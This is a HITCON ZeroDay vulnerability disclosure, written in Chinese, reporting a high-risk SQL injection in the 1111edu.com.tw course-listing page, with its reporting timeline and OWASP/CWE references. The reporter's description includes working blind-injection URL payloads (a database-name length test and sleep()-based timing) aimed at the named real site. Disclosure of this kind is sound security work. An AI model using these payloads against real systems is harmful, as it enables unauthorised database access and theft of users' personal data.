1111進修網 SQL Injection Vulnerability

Vulnerability Overview

ZDID: ZD-2018-01490
發信 Vendor: 全球華人股份有限公司
Title: 1111進修網 SQL Injection Vulnerability
Introduction: SQL Injection Vulnerability

處理狀態

目前狀態

公開

Last Update : 2018/11/30

新提交
已審核
已通報
未回報修補狀況
未複測
公開

處理歷程

2018/09/30 21:10:14 : 新提交 (由 Hzllaga 更新此狀態)
2018/09/30 21:12:13 : 新提交 (由 Hzllaga 更新此狀態)
2018/10/01 20:22:06 : 審核完成 (由 HITCON ZeroDay 服務團隊更新此狀態)
2018/10/04 20:42:28 : 通報未回應 (由 HITCON ZeroDay 服務團隊更新此狀態)
2018/10/04 20:42:28 : 通報未回應 (由 HITCON ZeroDay 服務團隊更新此狀態)
2018/11/30 03:00:04 : 公開 (由 HITCON ZeroDay 平台自動更新)

詳細資料

ZDID：ZD-2018-01490
通報者：haihai (Hzllaga)
風險：高
類型：資料庫注入攻擊 (SQL Injection)

參考資料

攻擊者可利用該漏洞取得後端資料庫權限及完整資料（包含大量使用者個資或敏感性資料），同時也有機會對資料進行破壞或修改。

漏洞說明： OWASP - SQL Injection
https://www.owasp.org/index.php/SQL_Injection

漏洞說明： OWASP - Top 10 - 2017 A1 - Injection
https://www.owasp.org/index.php/Top_10-2017_A1-Injection

漏洞說明： CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
https://cwe.mitre.org/data/definitions/89.html

防護方式： OWASP - SQL Injection Prevention Cheat Sheet
https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet

(本欄位資訊由系統根據漏洞類別自動產生，做為漏洞參考資料。)

敘述

跟上個漏洞一樣，sqlmap會被攔截，手工測試可以盲注

輸入單引號可以把sql語句打印出來

SELECT * FROM tb_typelayer WHERE parentId IN (1\') ### You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\')' at line 1

已經被addslashes過了，又是utf-8，沒辦法寬字節注入，所以直接盲注

http://www.1111edu.com.tw/advancedStudies_courseList.php?cate2=1) and length(database())=7-- -

資料庫名有7個字

帳號有20個字

http://www.1111edu.com.tw/advancedStudies_courseList.php?cate2=1) and sleep(1)-- -

sleep(1)延時9秒
sleep(2)延時18秒